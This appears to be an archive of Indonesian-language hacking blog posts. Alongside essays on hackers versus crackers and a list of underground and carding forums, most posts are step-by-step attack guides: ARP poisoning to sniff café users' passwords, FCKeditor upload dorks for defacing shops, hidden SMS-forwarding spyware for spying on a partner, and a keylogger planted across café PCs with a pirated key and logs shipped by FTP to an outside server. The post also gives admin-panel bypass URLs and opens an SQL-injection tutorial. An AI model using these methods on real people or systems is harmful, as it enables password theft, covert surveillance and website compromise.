Tampilkan postingan dengan label hacking. Tampilkan semua postingan
Tampilkan postingan dengan label hacking. Tampilkan semua postingan

Senin, 17 September 2012

0 Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)
bisa d lakukan di warnet atau hotspot2 yg free

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?


* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi


Perbedaan antara jaringan Hub dan Switch:


* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang, ex:hub d-link non cisco,tp-link noncisco
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut. ex: d-link with cisco


Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.


Hacking ini menggunakan teknik:


* Sniffing
* ARP Poison Routing


Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.


Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda


Kelebihan:


* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free


Kekurangan:


* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya



Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:


* Komputer Korban
* Komputer Hacker
* Server


Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:


1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

wireshark cari di om google
cain and able cari di om google.


Cara Menggunakan WireShark:


* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya


Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.


Cara Menggunakan Cain&Abel:


1. * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.


Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.


Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)


Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

sumber 

Jumat, 01 Juni 2012

0 Perbedaan Hacker Dan Cracker

Di indonesia, Hacker identik dengan seorang ahli komputer yang jahat dan merusak sistem komputer orang/institusi lain, Tapi tahukah anda bahwasanya pendapat ini ternyata keliru besar! Ada kesalahan persepsi mengenai Hacker, citra hacker bukanlah seperti itu. Untuk lebih jelasnya, yuk kita telusuri asal muasal Hacker dan apa perbedaanya dengan cracker.


Sejarah Hacker dan Cracker
Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.


Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak

bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.



Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.

Pengertian Hacker dan Cracker

1. Hacker
Hacker adalah sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet. Sebagai contoh: Digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer. Digigumi ini menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya, game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak. Hacker disini artinya, mencari, mempelajari dan mengubah sesuatu untuk keperluan hobi dan pengembangan dengan mengikuti legalitas yang telah ditentukan oleh developer game. Para hacker biasanya melakukan penyusupan-penyusupan dengan maksud memuaskan pengetahuan dan teknik. Rata - rata perusahaan yang bergerak di dunia jaringan global (internet) juga memiliki hacker. Tugasnya yaitu untuk menjaga jaringan dari kemungkinan perusakan pihak luar "cracker", menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak - abrik jaringannya, sebagai contoh : perusahaan asuransi dan auditing "Price Waterhouse". Ia memiliki team hacker yang disebut dengan Tiger Team. Mereka bekerja untuk menguji sistem sekuriti client mereka.


2. Cracker

Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking untuk keuntungan sendiri, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem.



Hirarki / Tingkatan Hacker

1. Elite

Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.



2. Semi Elite

Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.



3. Developed Kiddie

Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.



4. Script Kiddie

Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.



5. Lamer

Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software private, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.



Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak.



Kode Etik Hacker

1. Mampu mengakses komputer tak terbatas dan totalitas.

2. Semua informasi haruslah FREE.
3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.
4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.
5. Mampu membuat seni keindahan dalam komputer.
6. Komputer dapat mengubah hidup menjadi lebih baik.
7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.
10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.



Cracker tidak memiliki kode etik apapun.



Aturan Main Hacker

Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio, yaitu:

- Di atas segalanya, hormati pengetahuan & kebebasan informasi.
- Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.
- Jangan mengambil keuntungan yang tidak fair dari hack.
- Tidak mendistribusikan & mengumpulkan software bajakan.
- Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.

- Tidak pernah meng-hack sebuah sistem untuk mencuri uang.

- Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
- Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.
- Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main sedang Cracker tidak mempunyai kode etik ataupun aturan main karena cracker sifatnya merusak.

Minggu, 27 Mei 2012

0 ciri-ciri seorang Hacker dari Fisiknya


Tau Hacker? Itu loch orang yang hidupnya ngga terlepas dari dunia maya (Cyber-Space). Nah kali ini saya akan membahas ciri-ciri seorang hacker dari fisiknya...


1. Berkacamata
mengapa seorang Hacker biasa memakai kacamata...
gimana gak pake kacamata... wong tiap hari pelototin komputer terus....
minus... minus dah tuh mata...
tambah lagi Punya kaca mata yang bisa deteksi adanya jaringan wireless (udah ngayal nih) wkwkwk

2. Kemana-mana Bawa Tangtop... upss maksudnya Laptop...
setiap saat bisa langsung online nih.

3. Berbadan Kurus
kok Hacker berbadan kurus (tergantung selera, ada juga yang gemuk gan)
gimana gak kurus, tiap disuruh makan... "ntar dulu ah lagi nanggung neh didepan komputer"
makannya ntar aja...

4. Botak
Ga botak juga sih tergantung selera hacker juga kali, mungkin yang botak kebanyakan mikir sehingga rambutnya rontok semua.

5. Jarang Mandi
gimana gak jarang mandi....
disuruh mandi, ntar dulu ah lagi nanggung, dikit lagi bisa dijebol nech...
Jebol apa...??? gak tau dah...

6. Pake Celana Jeans sama Jaket Item
Tiap kalo jalan pasti pake celana Jeans ama Jaket item...
Ini Hacker apa Copet yach...???

7. Sering menghayal
Biasanya sih... Hacker sering menghayal.
gak tau ngehayal apa.... mungkin menghayal gimana bisa menembus komputer orang kale...

8. Sering Diem
Nah ini mungkin diem, karena dia menghayal tadi kayaknya....

9. Jarang tidur (begadangan)
kutak katik di depan kompie ampe pagi and pagi lagi...

10. Jarinya keriting
lho..kok jarinya bukan rambutnya...(kebanyakkan neken keybord)

11. Kalo kemana-mana Jakil
(jalan kaki karo sikil) kadang2 nebeng, kalo lagi ada duit naek angkot.

12. Matanya merah.
karena dari semua yang diatas tadi...1-11.

13. Tabungannya banyak
soalnya jarang makan dan jarang mandi (uang makan + uang buat beli sabun ditabung)


Sabtu, 26 Mei 2012

0 Forum-Forum Underground yang Ada di Indonesia

Kalian suka main diforum "underground" ngga? Itu lho... forum yang isinya membahas tentang dunia security, hacking, carding, defacing, sing... sing... apalah wkwk XD yang pasti semua threadnya berkaitan dengan dunia IT. Nah dipostingan kali ini saya akan membahas beberapa forum underground yang ada di Indonesia. Maaf Kalo agak berantakan postingnya :D



Berikut Forum-Forum Underground yang Ada di Indonesia :

1. Hacker Newbie - Community ( Link Forum )
Siapa yang tak kenal HN-Community, forum underground yang identik dengan icon "tengkorak dengan mata merah berkedip" ini merupakan salah satu forum underground favorite saya. Tampilan forumnya itu yang bikin saya suka, dan juga para adminnya yang ramah-ramah :D

2. Devilzc0de ( Link Forum )
Berawal dari sekumpulan anak-anak Tangerang yang bergabung di salah satu Forum Hacker Terbesar Indonesia. Mereka saling berbagi ilmu yang mereka miliki sesama member lainnya. Sedikit demi sedikit mereka kenal dan saling mengenal dengan member yang lainnya. Terutama sesama member yang terkhusus untuk daerah Tangerang, mereka lebih mempererat tali silaturahminya. Mungkin mereka pikir dengan mengenal member yang satu daerah, selain akrab di dunia Maya juga bisa akrab di dunia Nyata untuk bisa saling berbagi ilmu Hacking secara langsung.

3. YogyaCarderLink ( Link Forum )
Merupakan salah satu Forum Carder ternama di Indonesia. Sudah keliatan dari namanya Yogya"Carder Link" : "Tukang Main Kartu" eitts... bukan kartu poker lho, tapi kartu ATM, VISA, Paypal dll. Disana adalah tempatnya para carder belajar membobol kartu ATM, VISA, Paypall dsb. Tapi ngga hanya belajar membobol kartu lho, Yogyacarderlink juga sering melakukan aksi defacing dibeberapa situs luar dan dalam negeri.

4. Palembang Hacker Link ( Link Forum )
Merupakan forum underground indonesia yang bermarkas di Palembang. Forum ini sempat vakum akibat Serangan deface oleh decafer asal Medan Alex_own5. Namun sekarang PHL sudah pulih kembali dan aktif hingga saat ini.

5. XCode - Yogya Family Code ( Link Forum )
Adalah forum underground yang bermarkas di Kota Yogyakarta. Semua tutorial hacking ada semua disini. Forum ini masih satu kerabat dengan YogyaCarderLink.

Daftar diatas saya ambil dari berbagai sumber, jadi kalo sobat ragu dengan penjelasan diatas saya bisa memaklumi. Sekian postingan saya kali ini tentang daftar Forum-Forum Underground yang Ada di Indonesia. semoga postingan saya ini bisa bermanfaat bagi sobat semua.

Selasa, 19 April 2011

0 page hacker

Assalamualaikum...teman-teman
Ya mumpung saya lagi rajin, mau posting lagi ni :D
Kali iinnii tntang cara-cara HACKER :P hhaha
Okeh lah..males membuang waktu...Lets To try
Saya mau nunjukkin SS nya dlu.

hhahah...Tu google udh d rubah-rubah..
Ini prinsipny kyk JS yg prnh saya Share sblmny.
Kalo mau dpetin ini...klik add-ons ny
https://addons.mozilla.org/en-US/firefox/addon/page-hacker/

itu tuh...tnggal instaall aj.
Iy, utk aksiny, drag dlu iconny ke toolbar.
carany..plih view>toolbar>costumize>drag icon Page hackerny kluar.

Untk pake Page Hacker, buka hlman yg mau kita ubah...trus klik iconny.
Okay, smpe stu dlu..smga brmnfaat :D
Wassalam

0 Facebook Password Recovery

Kau yg membuka, kau juga yang harus bertanggung jawab :-/
Assalamualaikum..teman-teman :D
Bertemu lagi ni sama saya...hhehe stelah agak lama males posting.
Tapi terpksa, karena tuntutan kawan yang terus manyakan facebokk trs.
Kali ini saya punya tools yang keren...ini sama seperti di posting sebelumny.
Yang Twitter password recovery....
Okehlah...Langsung saja ke pembahasan ...
 Pertama-tama, saya mau nunjukkin scrrenshot nya dlu.

Wooowww..dari hasil screenshot, ternyta banyak yang sudah login di laptop ak :D
Berdoa saja, semoga sluruh akunny masih aktif, hhehe
Okay...jika anda tertarik ???
Bisa download  di sini langsung ajaa ya di Instal.
Rasakan Backup Password n username yang anda dapati :D
Okay...semoga bermnfaat aj..
wassalam

0 Teknik Deface Full Version

Assalamualaikum..teman-teman.
Saya mau menampilkan lagi teknik deface :D
Kali ini, saya akan memberikan kpada anda smua teknikny.
Disini saya akan membahas 4 teknik deface yang mngkin di pakai defacer.
Saya termasuk Org yg anti mnggunkan tools pada saat mendeface website :D
Okay, lngsung aja....cekidot


1. Powered by CubeCard.
2. Powered By OpenCart
3. Powered By OscMax V 2.0
4. Connector Txt

1. Powered CubeCart
Adalah module Deface Upload file, kita bisa menggunakan cara ini.
Dork    : Powered By CubeCart V 3.0
Exploit :  /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html 
Contoh: www.test.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

2. Powered By OpenCart
Dork   :  Powered By OpenCart
Exploit:  admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Contoh : www.asu.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

3. Powered By OscMax V 2.0
Dork    : Powered By OscMax V 2.0
Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh ;www.cekcu.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

4. Hacking TXt.
Hacking Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima :D 
Dork   : Inurl:/FCKeditor/editor/filemanager/
Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
Semua yang saya tulis adalah dalam bntuk FCkeditor, khusus upload file :D
Cara pakainya:
1. Connector >> Pilih "PHP"
2. Klik Upload.
3. Jika Berhasil ada tulisa "file upload No eror"
4. Buka Get Folder utk mndptkan patch URL
5. Jika sudah, ketik nama file yg anda upload td.

Contoh : www.contoh.com/userFiles/fille/yudha.html ato www.contoh.com/yudha.html


Wassalam.  

Sabtu, 09 April 2011

0 sadap SMS

assalamualaikum... teman-teman. . saya mau posting lagi , kali ini adalah trik untuk menyadap ponsel, bisa anda gunakan sebagai mata-mata untuk pacar biar tidak selingkuh.
hehehehehehe .

oke langsung saja.

syarat:

# HP adalah HP symbian. Baik HP anda maupun HP teman anda.
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sis

hp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis

Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :


1. download smsanywherelite.sis untuk software menyadap.
direct link :
http://7c3e65c9.linkbucks.com/?lurl=http..._1_4_1.SIS

kalau tidak bisa disitu, silahkan download di :
http://www.ziddu.com/download/3233238/sm...s.zip.html


2. Masukkan aplikasi symbian itu di HP anda dan korban

3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

4. Siapkan hp/ponsel korban anda

5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.

6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.

7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0

8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya 

0 cracking FACEBOOK

assalamualaikum... teman-teman. . saya mau posting lagi , tentang facebook cracking. lansung aje ke TKP. . .

ini biasanya dalam warnet yang mempunyai jaringan lokal, jadi ya kamu bisa aja cuma main di 1 kompi dan menanam "mine" di semua client

install "Alchemy Remote Executor" untuk apps remote di client yang kamu pake dan remote semua clientnya, kalo kamu gak tau IPnya ya silahkan gunakan netcut untuk scannya, atau apalah aplikasi yang kemampuannya scan IP.

lalu kamu hajar deepfreezenya menggunakan anti deepfreeze yang sudah disiapkan. matikan deepfreezenya,

instal ardamax
masukan user dan key na
Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT


centang option yang perlu di centang
Di Menu General
-invisibility
Centang Semuanya Oke
ini berfungsi untuk menghilangkan tampilan keyloger

-Options
Centang
Run at windows Start Up
start In Hidden Mode
Saat start up , keylogger ini tidak akan nampak tapi tetap bekerja, untuk melihatnya gunakan shift+alt+h

setting menu delivery

-control
send log every 60 menit ( iniuntuk report yang akan dikirim secara otomatis oleh keylogger)
delivery method : ftp

disini kamu bisa milih cara apa untuk menghasilkan repport yang akan dikirim si keylogger, kalo aku sih pake ftp

-FTP
isi dengan
ftp host : http://ftp.usl.co.id
Remote folder : arthacking
Port : 21
username : tux@usl.co.id
password : **************

Coba Test (Jika Sukses Berarti Kamu Udah Benar)


klik kanan lagi segera hidden Mode

pasang kembali deepfreeze, agar tidak dicurigai,

sesudah ini kamu jadi juragan yang tinggal nunggu ikan yang masuk perangkap kamu  ini biasanya dalam warnet yang mempunyai jaringan lokal, jadi ya kamu bisa aja cuma main di 1 kompi dan menanam "mine" di semua client

install "Alchemy Remote Executor" untuk apps remote di client yang kamu pake dan remote semua clientnya, kalo kamu gak tau IPnya ya silahkan gunakan netcut untuk scannya, atau apalah aplikasi yang kemampuannya scan IP.

lalu kamu hajar deepfreezenya menggunakan anti deepfreeze yang sudah disiapkan. matikan deepfreezenya,

instal ardamax
masukan user dan key na
Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT


centang option yang perlu di centang
Di Menu General
-invisibility
Centang Semuanya Oke
ini berfungsi untuk menghilangkan tampilan keyloger

-Options
Centang
Run at windows Start Up
start In Hidden Mode
Saat start up , keylogger ini tidak akan nampak tapi tetap bekerja, untuk melihatnya gunakan shift+alt+h

setting menu delivery

-control
send log every 60 menit ( iniuntuk report yang akan dikirim secara otomatis oleh keylogger)
delivery method : ftp

disini kamu bisa milih cara apa untuk menghasilkan repport yang akan dikirim si keylogger, kalo aku sih pake ftp

-FTP
isi dengan
ftp host : http://ftp.usl.co.id
Remote folder : arthacking
Port : 21
username : tux@usl.co.id
password : **************

Coba Test (Jika Sukses Berarti Kamu Udah Benar)


klik kanan lagi segera hidden Mode

pasang kembali deepfreeze, agar tidak dicurigai,

sesudah ini kamu jadi juragan yang tinggal nunggu ikan yang masuk perangkap kamu ini biasanya dalam warnet yang mempunyai jaringan lokal, jadi ya kamu bisa aja cuma main di 1 kompi dan menanam "mine" di semua client

install "Alchemy Remote Executor" untuk apps remote di client yang kamu pake dan remote semua clientnya, kalo kamu gak tau IPnya ya silahkan gunakan netcut untuk scannya, atau apalah aplikasi yang kemampuannya scan IP.

lalu kamu hajar deepfreezenya menggunakan anti deepfreeze yang sudah disiapkan. matikan deepfreezenya,

instal ardamax
masukan user dan key na
Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT


centang option yang perlu di centang
Di Menu General
-invisibility
Centang Semuanya Oke
ini berfungsi untuk menghilangkan tampilan keyloger

-Options
Centang
Run at windows Start Up
start In Hidden Mode
Saat start up , keylogger ini tidak akan nampak tapi tetap bekerja, untuk melihatnya gunakan shift+alt+h

setting menu delivery

-control
send log every 60 menit ( iniuntuk report yang akan dikirim secara otomatis oleh keylogger)
delivery method : ftp

disini kamu bisa milih cara apa untuk menghasilkan repport yang akan dikirim si keylogger, kalo aku sih pake ftp

-FTP
isi dengan
ftp host : http://ftp.usl.co.id
Remote folder : arthacking
Port : 21
username : tux@usl.co.id
password : **************

Coba Test (Jika Sukses Berarti Kamu Udah Benar)


klik kanan lagi segera hidden Mode

pasang kembali deepfreeze, agar tidak dicurigai,

sesudah ini kamu jadi juragan yang tinggal nunggu ikan yang masuk perangkap kamu

Jumat, 08 April 2011

0 Admin Content Module Home

Assalamualaikum...teman-teman.
Saya mau posting lgi, sdkit pmhaman tntang Dork google lg.
Ya Dork Google, bnyk skali yg d sediakan untk media Hacking.
Kali ini saya akn mmbhas Dork Admin home modul.
Sdh bnyk yg sya dpetin, bngung mau d apain ??
Tapi ada jg yg brhsil..Lets to try
Pertama-tama..
Cari google dork brikut: "allinurl:media.php?module"

Nh tnggal cri trget aj..tpi bnyk web Indonesia d stu.
Disaranin cri web luar negri.
Cara pakeny.
jika sdh ktemu trget.cntoh
www.contoh.com/media.php?module=profil
Nah pada tulisan "media.php?module=profil" hpus dn gnti dgn
 "admin/content.php?module=home"
jd sprti ini www.contoh.com/ admin/content.php?module=home

Klo udh psti ad gmbr d atas.
Klo sudah ada ..rbh lg domain tsb jd sprti ini www.contoh.com/admin/content.php?module=user
Klo Berhsil, maka akn msuk k hlman Admin. pada hlman trsbut plih tmbh baru.
Nh klo udh brhsil, klik smpan lalu login aj deh.. :D
Ni hsil cntoh pnya saya



0 SQL Injection Step By Step

Assalamualaikum....posting lagi.
kali ini copas aj..coz pnjang bner :D lngsung dari
www.palembanghackerlink.com
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========


Quote:carilah target di google
masukkan dork ini di google : inurl:index.php?id=
pilih salah satu site di google .
misal: [site]/berita.php?id=100

